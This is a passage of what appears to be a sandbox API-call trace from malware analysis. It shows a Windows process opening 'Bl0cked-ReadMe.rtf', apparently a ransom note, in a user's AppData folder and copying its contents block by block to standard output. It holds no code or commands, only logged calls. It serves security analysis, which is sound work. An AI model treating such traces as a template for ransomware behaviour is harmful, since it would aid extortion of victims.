lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f244, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f244) returned 0x240e80 [0192.875] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0192.875] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0192.875] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0192.875] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e150, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0192.875] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] GetFileType (hFile=0x54) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e1a8 | out: lpFileSizeHigh=0x18e1a8*=0x0) returned 0x1632 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.876] GetFileType (hFile=0x4c) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.876] GetFileType (hFile=0x4c) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.876] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.878] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.878] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.879] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.880] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] GetFileType (hFile=0x4c) returned 0x1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] GetFileType (hFile=0x4c) returned 0x1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.882] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.883] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.885] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, 